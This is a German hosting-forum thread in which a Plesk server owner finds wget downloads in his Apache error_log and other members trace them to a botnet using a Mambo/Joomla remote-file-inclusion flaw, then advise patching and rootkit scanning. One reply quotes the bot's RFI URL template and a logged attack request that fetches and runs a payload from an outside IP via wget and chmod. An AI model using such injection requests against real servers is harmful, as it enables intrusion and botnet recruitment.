error_log komischer Eintrag

B

Bodoman

Registered User
Hallo zusammen,

hat jemand von Euch so was schon mal gesehen??? Bin mir unsicher was das ist, das habe ich in der Erro_log vom Apache gefunden.

--10:53:09-- http: // 219.84.105.36/ping
=> `ping'
Connecting to 219.84.105.36:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 11,145 (11K) [text/plain]

0K .......... 100% 13.23 KB/s

10:53:11 (13.23 KB/s) - `ping' saved [11145/11145]

% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 358 100 358 0 0 418 0 --:--:-- --:--:-- --:--:-- 418100 358 100 358 0 0 418 0 --:--:-- --:--:-- --:--:-- 0
--10:53:11-- http:// 219.84.105.36/httpd
=> `httpd'
Connecting to 219.84.105.36:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 407,576 (398K) [text/plain]

0K .......... .......... .......... .......... .......... 12% 9.37 KB/s
50K .......... .......... .......... .......... .......... 25% 29.48 KB/s
100K .......... .......... .......... .......... .......... 37% 48.33 KB/s
150K .......... .......... .......... .......... .......... 50% 52.93 KB/s
200K .......... .......... .......... .......... .......... 62% 52.73 KB/s
250K .......... .......... .......... .......... .......... 75% 47.02 KB/s
300K .......... .......... .......... .......... .......... 87% 45.09 KB/s
350K .......... .......... .......... .......... ........ 100% 43.32 KB/s

10:53:27 (30.06 KB/s) - `httpd' saved [407576/407576]
 
Tja, würde mal sagen Volltreffer, da hat jmd in einem deiner Scripte, oder im Apachen selbst eine Lücke ausgenutzt, und lädt wild per wget Sachen auf deine Maschine (diese Prozentbalken deuten darauf hin). Was sich genau hinter "ping" und "httpd" versteckt will ich lieber gar nicht wissen...

MfG
 
http: // 219.84.105.36/ping = Taiwan...na herzlichen Glückwunsch!

Ich würde mal schnell die Trafficwerte checken und neue Dateien auf deinem Server prüfen.
Entweder dosst jemand mit deinem Server oder du hast gerade die neusten Kinofilme irgendwo auf der Festplatte rumfliegen ;)
 
djrick said:
http: // 219.84.105.36/ping = Taiwan...na herzlichen Glückwunsch!

Ich würde mal schnell die Trafficwerte checken und neue Dateien auf deinem Server prüfen.
Entweder dosst jemand mit deinem Server oder du hast gerade die neusten Kinofilme irgendwo auf der Festplatte rumfliegen ;)
Click to expand...


Na wenn da keine Freude aufkommt.
Sorry ich musste mich dem Ironieaustoß einfach anschliessen :D
 
hmm

Naja so lustig finde ich das nicht. Die traffic war für 5 Minuten hoch, dann war es vorbei. Ausserdem ist es ein neu installiertes System, und das erste was ich gemacht habe ist, das ich die Firewall konfiguriert habe. Da muss ja wenn im Grundsystem schon ein Fehler sein, oder??
System Suse 9.3/Plesk 7.5.4.
Und drauf ist eigentlich noch fast nix.

Kann mir vielleicht jemand nen Tipp geben um das Suchen anzufangen, bzw. mir helfen den Kasten dicht zu kriegen.
 
Ja natürlich.
Aber das war schon ernst gemeint mit: Durchsuch den Server nach neuen Dateien!

du sagst du hast FAST nichts auf dem Server. Was hast du denn für Programme im Hintergrund laufen und Welche Software ist installiert...nutzt du Forensoftware wie PHPBB oder soetwas?
 
So ich habe mal nach deinem Problem gesucht und folgendes gefunden
die Datei “211.234.113.241/scripz” mal an.
Es ist ein kleines Bash-Skript, das 2 weitere Dateien zieht.
219.84.105.36.42/ping und 219.84.105.36.42/httpd.
Ping ist ein binary
Click to expand...

httpd hingegen ist ein kleiner IRC-Client in Perl, der dafür sorgt das sich alle infizierten Clients in Undernet in einem Channel sammeln und sich mit einem “Hallo, hier bin ich.” melden.
Click to expand...

In eben jenen Channel bin ich dann auch mal spontan gegangen und hatte eine nettes sinnloses Gespräch mit einem der 3 Betreiber des Botnets.

Zitat:
<xxx> the botnet is just something for fun :)
<xxx> nothing else
[…]
<xxx> i run the bots with the uid that the apache servere is started
<xxx> nothing more
[…]
[We are scanning…]
<xxx> mambo awstats and xmlrpc
<xxx> and other php bugs :P
<xxx> try to patch your server…
Click to expand...

Quelle : http://amish-geeks.de/blog/botnets-sind-nicht-witzig/

Bei dem betroffenen war es eine Schwachstelle in awstats.
 
Bodoman said:
Ausserdem ist es ein neu installiertes System, und das erste was ich gemacht habe ist, das ich die Firewall konfiguriert habe. Da muss ja wenn im Grundsystem schon ein Fehler sein, oder??
Click to expand...
Mal wieder ein Beweis dass eine Firewall auf einem Server Mumpitz ist...
Der Angreifer gelangte ja durch den logischerweise nicht geblockten Port 80 auf deinen root.

Bodoman said:
Kann mir vielleicht jemand nen Tipp geben um das Suchen anzufangen, bzw. mir helfen den Kasten dicht zu kriegen.
Click to expand...
Genau die Logs weiter durchsuchen, vor allem access_log, da dort ein bestimmter Get-String stehen müsste, der die Schwachstelle offenbaren sollte.

MfG
 
Noch ein Zusatz.

Bei der suche nach der IP findet man ein paar Ergebnisse bei Google.
Vielleicht noch Hilfreich bei dem Problem, allerdings ist z.B. mein Dänisch nicht so gut :o
 
Danke

Danke erst mal für Eure Tips.

im Logfile steht zum den Zeitpunkten des Trafficanstieges jeweils folgendes

72.30.132.147 - - [25/Feb/2006:20:03:50 +0100] "GET /robots.txt HTTP/1.0" 301 342 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.133.226 - - [25/Feb/2006:20:04:05 +0100] "GET / HTTP/1.0" 301 332 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"

in der Error log steht eigentlich gar nix, und neue Dateien Fehlanzeige! Forensoftware ist nicht installiert. Nur Joomla Release 1.0.7.
Ich hatte vor einigen Tagen einen Hack über PHPBB. Das ist aber komplett rausgefolgen und nirgens mehr drauf. Register Globals in der PHP sind auf Off nur auf zwei Domains ist PHP safe mode off aber nicht Global.

Ich würde auch evt. Gratifikationen verteilen für den der mir mein System Sicher macht.
 
Hallo!
Das zu fixen sollte nicht so schwer sein:
Code: 
mambo awstats and xmlrpc
sowie PHP aktuell halten.

mfG
Thorsten
 
Bodoman said:
im Logfile steht zum den Zeitpunkten des Trafficanstieges jeweils folgendes

72.30.132.147 - - [25/Feb/2006:20:03:50 +0100] "GET /robots.txt HTTP/1.0" 301 342 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.133.226 - - [25/Feb/2006:20:04:05 +0100] "GET / HTTP/1.0" 301 332 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
Click to expand...
Das sind nicht die richtigen Einträge, das ist nur ein Yahoo Bot, der deine Page indiziert hat, nix gefährliches.

Bodoman said:
Forensoftware ist nicht installiert. Nur Joomla Release 1.0.7.
Click to expand...
Das sieht schon interessanter aus. Soweit ich weiss sind Joomla und Mambo sehr verwandt, und könnten die gleichen Fehler beinhalten...

MfG
 
danken

Thorsten du sagst das es einfach wäre das zu fixen, aber ich leider weiß nicht wie.
Ich stehe zwar einw enig ind er Materie aber so auch wieder nicht. Ich dachte eigentlich das ich mich ein wenig auskenne, aber es scheint leider nicht so.

Wenn ich in der Firewall sämtlichen ausgehenden Traffic verhindere ist Ruhe :-)
Ich habe auch schon extra Regeln für den Backupserver erstellt die auch funktionieren (ausgehend).

@kannix
hast Du da konkrete Hinweise wegen Joomla oder Mambo ???
 
Du hast doch jetzt schon alle Hinweise zusammen. Die wget Ip muss auch irgendwo in den logs auftauchen...
Weiterhin wirf einen Blick in das Perl Script, dann findest du:
Code: 
$url=$path."/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=$boturl?";
D.h. Mambo scheint die mosConfig_absolute_path Variable nicht zu prüfen, weshalb mit $boturl schadhafter Code eingeschleust werden kann.
Dies könnte zb so aussehen: (per google gefunden)
Code: 
[Wed Jan 4 07:26:12 2006] [error] [client 147.202.45.232] request failed: erroneous characters after protocol string: GET index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|HTTP\x01.1

siehe auch:
http://cert.uni-stuttgart.de/archive/win-sec-ssc/2005/12/msg00017.html

MfG
 
Last edited by a moderator:
@kannix
erst einmal Danke für Deine Antwort, ich habe die Logfiles durchgeschaut, aber mit wget oder so ist da nix drinne.
Du kannst gerne mal auf die Maschine drauf wenn du willst und selber nachschauen.

Ich bin eigentlich eher aus der Windows Welt und ich musste leider merken das das Networking unter Linux doch seine eigenen Regeln hat.
Aber es sind ja keine Ahnung wieviel Server da draussen mit Joomla die ja anscheinend stabil laufen.

Ich werde mal den Hinweisen nachgehen und mich dann wieder melden wenn ich was gefunden haben.

Aber trotzdem Danke und ich finds toll das es so ein Forum gibt!
 
Bodoman said:
ich habe die Logfiles durchgeschaut, aber mit wget oder so ist da nix drinne.
Click to expand...
Du sollst sie nicht nach wget durchsuchen, sondern nach der Uhrzeit.
Wenn Du den passenden Eintrag (nach Uhrzeit) zu Deinem 'Eintrag' im error_log findest, hast Du den Übeltäter.

huschi.
 
danke

Ja is klar, habe ich ja gemacht, aber nicht wirklich was gefunden. Was ich heute gemacht habe ist rootkit laufen lassen, alles war ok, hat nichts gefunden. Kernel update gemacht.

Ausserdem bin ich mit jemanden draufgekommen das die psa PHP 4.3.10 nicht so doll wäre und ich auf 4.4 updaten sollte. Allerdings stellt sich mir hier die Frage ob das Plesk nicht zu tief drinstitzt und dann etwas nicht mehr läuft. Weil Plesk ja auch den eigenen Apache mitbringt denke ich ist es bei PHP auch so.

Ausserdem habe ich noch bei einer Domain eine alte Joomlainstallation gefunden wo es passen könnte das das passiert ist. Unter der 1.0.3 war ja da son Bug drinn. Seid dem ist auch einigermaßen Ruhe auf der Kiste.

Ausserdem habe ich entdeckt has das /tmp nach dem Neustart auf 777 steht, ist auch nicht so doll denke ich, und habe das geändert.

Vielleicht hat mir jemand von Euch nen Tip mit PHP+Plesk7.5.4+Strato. Weil das meiste hier im Forum ist ja Debian und 1und1.
 
Hallo,

PHP kannst du immer updaten. Das beeinträchtigt Plesk nicht.
Welche Distibution hast du denn drauf? SuSE weil dann kannst du die PHP RPMs hier aus dem Forum nehmen.
PHP Update würde ich dir auch empfehlen, aber ich glaube eher dass der Angriff so aus der Joomla-Gegend kam. Frag nicht warum, hab ich einfach so im Gefühl
 
Bodoman said:
Was ich heute gemacht habe ist rootkit laufen lassen,
Click to expand...
Schau auch mal nach rkhunter. Der ist i.d.R. besser, und vorallem aktueller.

das die psa PHP 4.3.10 nicht so doll wäre
Click to expand...
Redest Du jetzt von der PHP-Version die auf den User-Webs läuft, oder von der PHP-Version unter der das Plesk läuft?
Ersteres darfst Du austauschen, letzteres ist schon etwas schwieriger.

das /tmp nach dem Neustart auf 777 steht, ist auch nicht so doll denke ich
Click to expand...
Auf /tmp sollte jeder zugreifen können. Kann sonst sein, daß einiges andere im System nicht mehr richtig funktioniert.
Wichtiger ist, daß PHP ein eigenen temp-Verzeichnis nutzt. Am besten eins welches mit dem NoExec-Flag gemountet ist. (Aber das sind jetzt schon höhere Feinheiten.)

huschi.
 
@Huschi

Habe Rkhunter gezogen und laufen lassen, meckert openSSL an. Sonst nichts. Das Ding ist gut, und von der Ausgabe her auch etwas besser als chkrootkit.

PHP habe ich auch mit Eurem rpm´s auf 4.4.2 geupdated. Prima Sache mit den rpm´s. Habe es per YAST gemacht und ging Problemlos.

Ich gehe auch stark davon aus das es Joomla war. Aber jetzt ist Ruhe.

Ich danke Euch allen und wie gesagt Supersache das Forum.
 
You must log in or register to reply here.
Back
Top